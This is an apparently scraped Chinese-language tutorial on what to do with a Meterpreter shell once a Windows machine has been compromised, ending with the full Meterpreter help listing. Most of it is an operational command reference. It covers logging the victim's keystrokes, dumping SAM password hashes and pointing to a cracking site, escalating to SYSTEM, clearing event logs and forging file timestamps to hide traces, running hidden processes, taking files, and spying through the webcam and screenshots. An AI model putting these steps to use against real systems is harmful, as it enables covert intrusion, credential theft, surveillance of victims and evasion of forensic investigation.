当你用metasploit成功的***一台Windows主机后,你会获得一个Meterpreter 的Shell,今天我就会给大家讲一讲Meterpreter 获取shell以后的运用

当你看到了

[*] Meterpreter session 1 opened (192.168.195.140:4444 -> 192.168.195.139:1051) 

这就代表这你在目标系统上成功的获得了Meterpreter的Shell

sessions -l 用于查看你控制的电脑

你会看到:

 
    
     
         
  1. Id Description Tunnel 
    2.  
         
  2.  
    3.  
         
  3. 4  meterpreter x86/win32  server-PC\Administrator @ SERVER-PC  192.168.195.140:4444 -> 192.168.195.1:52540 (192.168.195.1) 
    4.  
        
 
    
 
 
    
注意前面的ID号
 
    
你要控制哪台就输入:
 
    
meterpreter >sessions -i  4
 
    
例如本次案例ID号为:4
 
    
meterpreter >sysinfo
 
    
显示目标系统信息
 
    
meterpreter > backround
 
    
退出目标系统,回到Metasploit主界面
 
    
meterpreter > ps
 
    
显示目标系统上的进程
 
    
meterpreter > keyscan_start
 
    
监控目标系统键盘输入,停止监控为keyscan_stop
 
    
meterpreter > migrate
 
    
将你的Meterpreter移到另一个进程
 
    
先用PS命令查看进程后,得到进程ID,然后在执行Migrate (进程ID)
 
    
meterpreter > ipconfig
 
    
显示对方网络信息
 
    
meterpreter > getuid
 
    
获取用户的服务器运行
 
    
meterpreter > shell
 
    
进入目标电脑,命令提示符
 
    
meterpreter > Idletime
 
    
目标电脑闲置了多长时间
 
    
meterpreter > Hashdump
 
    
导出对方SAM数据库里的内容,推荐一个hash破解网站:
 
    
http://www.objectif-securite.ch/products.php
 
    
meterpreter > getsystem
 
    
利用已自漏洞,自动提权为SYSTEM
 
    
meterpreter > clearev
 
    
清除事件日志
 
    
 meterpreter > execute (某Windows指令)
 
    
在对方电脑上运行该指令
 
    
 
    
     
         
  1. meterpreter > execute 
    2.  
         
  2. Usage: execute -f file [options] 
    3.  
         
  3.  
    4.  
         
  4. Executes a command on the remote machine. 
    5.  
         
  5.  
    6.  
         
  6. OPTIONS: 
    7.  
         
  7.  
    8.  
         
  8.     -H        Create the process hidden from view. 
    9.  
         
  9.     -a <opt>  The arguments to pass to the command. 
    10.  
         
  10.     -c        Channelized I/O (required for interaction). 
    11.  
         
  11.     -d <opt>  The 'dummy' executable to launch when using -m. 
    12.  
         
  12.     -f <opt>  The executable command to run. 
    13.  
         
  13.     -h        Help menu. 
    14.  
         
  14.     -i        Interact with the process after creating it. 
    15.  
         
  15.     -k        Execute process on the meterpreters current desktop 
    16.  
         
  16.     -m        Execute from memory. 
    17.  
         
  17.     -s <opt>  Execute process in a given session as the session user 
    18.  
         
  18.     -t        Execute process with currently impersonated thread token 
    19.  
        
 
    
meterpreter >timetomp
 
    
修改文件时间属性
 
    
meterpreter >timestomp c:\\jzking121.txt -c "09/09/1980 12:12:34"   修改文件创建时间
 
    
meterpreter > timestomp c:\\jzking121.txt -m "01/01/1991 12:12:34"  修改文件修改时间
 
    
 meterpreter > timestomp c:\\jzking121.txt -f c:\\RHDSetup.log 讲文件RHDSetup.log属性复制到jzking121文件上面
 
    
meterpreter > download (文件路径)
 
    
下载文件命令
 
    
例如下载C盘下面的jzking121.txt文件
 
    
meterpreter > download c:\\jzking121.txt
 
    
[*] downloading: c:\jzking121.txt -> jzking121.txt
 
    
[*] downloaded : c:\jzking121.txt -> jzking121.txt
 
    
 
     注意,文件路径中要有两个\\ 
    
 
    
      Upload指令跟Download指令类似! 
    
 
    
 meterpreter > shutdown 
 
    
关闭目标计算机,reboot为重启计算机
 
    
meterpreter >screenshot
 
    
获取目标电脑,屏幕截图
 
    
 meterpreter > uictl enable keyboard 启用目标使用键盘
 
    
meterpreter > uictl disable mouse    禁止目标使用鼠标
 
    
enable 为启用
 
    
disable 禁用
 
    
 meterpreter > webcam_list
 
    
目标系统的摄像头列表
 
    
 meterpreter > webcam_snap
 
    
从指定的摄像头,拍摄照片
 
    
 meterpreter > search -d c:\\ -f 1.jpg
 
    
搜索目标电脑,C盘1.jpg文件
 
    
 
 
    
 
 
    
 
 
    
 
 
    
             
         
 
 
 
        
     
             
  1. meterpreter > help 
    2.  
             
  2.  
    3.  
             
  3. Core Commands 
    4.  
             
  4. ============= 
    5.  
             
  5.  
    6.  
             
  6.     Command                   Description 
    7.  
             
  7.     -------                   ----------- 
    8.  
             
  8.     ?                         Help menu 
    9.  
             
  9.     background                Backgrounds the current session 
    10.  
             
  10.     bgkill                    Kills a background meterpreter script 
    11.  
             
  11.     bglist                    Lists running background scripts 
    12.  
             
  12.     bgrun                     Executes a meterpreter script as a background thread 
    13.  
             
  13.     channel                   Displays information about active channels 
    14.  
             
  14.     close                     Closes a channel 
    15.  
             
  15.     disable_unicode_encoding  Disables encoding of unicode strings 
    16.  
             
  16.     enable_unicode_encoding   Enables encoding of unicode strings 
    17.  
             
  17.     exit                      Terminate the meterpreter session 
    18.  
             
  18.     help                      Help menu 
    19.  
             
  19.     info                      Displays information about a Post module 
    20.  
             
  20.     interact                  Interacts with a channel 
    21.  
             
  21.     irb                       Drop into irb scripting mode 
    22.  
             
  22.     load                      Load one or more meterpreter extensions 
    23.  
             
  23.     migrate                   Migrate the server to another process 
    24.  
             
  24.     quit                      Terminate the meterpreter session 
    25.  
             
  25.     read                      Reads data from a channel 
    26.  
             
  26.     resource                  Run the commands stored in a file 
    27.  
             
  27.     run                       Executes a meterpreter script or Post module 
    28.  
             
  28.     use                       Deprecated alias for 'load' 
    29.  
             
  29.     write                     Writes data to a channel 
    30.  
             
  30.  
    31.  
             
  31.  
    32.  
             
  32. Stdapi: File system Commands 
    33.  
             
  33. ============================ 
    34.  
             
  34.  
    35.  
             
  35.     Command       Description 
    36.  
             
  36.     -------       ----------- 
    37.  
             
  37.     cat           Read the contents of a file to the screen 
    38.  
             
  38.     cd            Change directory 
    39.  
             
  39.     download      Download a file or directory 
    40.  
             
  40.     edit          Edit a file 
    41.  
             
  41.     getlwd        Print local working directory 
    42.  
             
  42.     getwd         Print working directory 
    43.  
             
  43.     lcd           Change local working directory 
    44.  
             
  44.     lpwd          Print local working directory 
    45.  
             
  45.     ls            List files 
    46.  
             
  46.     mkdir         Make directory 
    47.  
             
  47.     pwd           Print working directory 
    48.  
             
  48.     rm            Delete the specified file 
    49.  
             
  49.     rmdir         Remove directory 
    50.  
             
  50.     search        Search for files 
    51.  
             
  51.     upload        Upload a file or directory 
    52.  
             
  52.  
    53.  
             
  53.  
    54.  
             
  54. Stdapi: Networking Commands 
    55.  
             
  55. =========================== 
    56.  
             
  56.  
    57.  
             
  57.     Command       Description 
    58.  
             
  58.     -------       ----------- 
    59.  
             
  59.     ifconfig      Display interfaces 
    60.  
             
  60.     ipconfig      Display interfaces 
    61.  
             
  61.     portfwd       Forward a local port to a remote service 
    62.  
             
  62.     route         View and modify the routing table 
    63.  
             
  63.  
    64.  
             
  64.  
    65.  
             
  65. Stdapi: System Commands 
    66.  
             
  66. ======================= 
    67.  
             
  67.  
    68.  
             
  68.     Command       Description 
    69.  
             
  69.     -------       ----------- 
    70.  
             
  70.     clearev       Clear the event log 
    71.  
             
  71.     drop_token    Relinquishes any active impersonation token. 
    72.  
             
  72.     execute       Execute a command 
    73.  
             
  73.     getpid        Get the current process identifier 
    74.  
             
  74.     getprivs      Attempt to enable all privileges available to the current process 
    75.  
             
  75.     getuid        Get the user that the server is running as 
    76.  
             
  76.     kill          Terminate a process 
    77.  
             
  77.     ps            List running processes 
    78.  
             
  78.     reboot        Reboots the remote computer 
    79.  
             
  79.     reg           Modify and interact with the remote registry 
    80.  
             
  80.     rev2self      Calls RevertToSelf() on the remote machine 
    81.  
             
  81.     shell         Drop into a system command shell 
    82.  
             
  82.     shutdown      Shuts down the remote computer 
    83.  
             
  83.     steal_token   Attempts to steal an impersonation token from the target process 
    84.  
             
  84.     sysinfo       Gets information about the remote system, such as OS 
    85.  
             
  85.  
    86.  
             
  86.  
    87.  
             
  87. Stdapi: User interface Commands 
    88.  
             
  88. =============================== 
    89.  
             
  89.  
    90.  
             
  90.     Command        Description 
    91.  
             
  91.     -------        ----------- 
    92.  
             
  92.     enumdesktops   List all accessible desktops and window stations 
    93.  
             
  93.     getdesktop     Get the current meterpreter desktop 
    94.  
             
  94.     idletime       Returns the number of seconds the remote user has been idle 
    95.  
             
  95.     keyscan_dump   Dump the keystroke buffer 
    96.  
             
  96.     keyscan_start  Start capturing keystrokes 
    97.  
             
  97.     keyscan_stop   Stop capturing keystrokes 
    98.  
             
  98.     screenshot     Grab a screenshot of the interactive desktop 
    99.  
             
  99.     setdesktop     Change the meterpreters current desktop 
    100.  
             
  100.     uictl          Control some of the user interface components 
    101.  
             
  101.  
    102.  
             
  102.  
    103.  
             
  103. Stdapi: Webcam Commands 
    104.  
             
  104. ======================= 
    105.  
             
  105.  
    106.  
             
  106.     Command       Description 
    107.  
             
  107.     -------       ----------- 
    108.  
             
  108.     webcam_list   List webcams 
    109.  
             
  109.     webcam_snap   Take a snapshot from the specified webcam 
    110.  
             
  110.  
    111.  
             
  111.  
    112.  
             
  112. Priv: Elevate Commands 
    113.  
             
  113. ====================== 
    114.  
             
  114.  
    115.  
             
  115.     Command       Description 
    116.  
             
  116.     -------       ----------- 
    117.  
             
  117.     getsystem     Attempt to elevate your privilege to that of local system. 
    118.  
             
  118.  
    119.  
             
  119.  
    120.  
             
  120. Priv: Password database Commands 
    121.  
             
  121. ================================ 
    122.  
             
  122.  
    123.  
             
  123.     Command       Description 
    124.  
             
  124.     -------       ----------- 
    125.  
             
  125.     hashdump      Dumps the contents of the SAM database 
    126.  
             
  126.  
    127.  
             
  127.  
    128.  
             
  128. Priv: Timestomp Commands 
    129.  
             
  129. ======================== 
    130.  
             
  130.  
    131.  
             
  131.     Command       Description 
    132.  
             
  132.     -------       ----------- 
    133.  
             
  133.     timestomp     Manipulate file MACE attributes 
    134.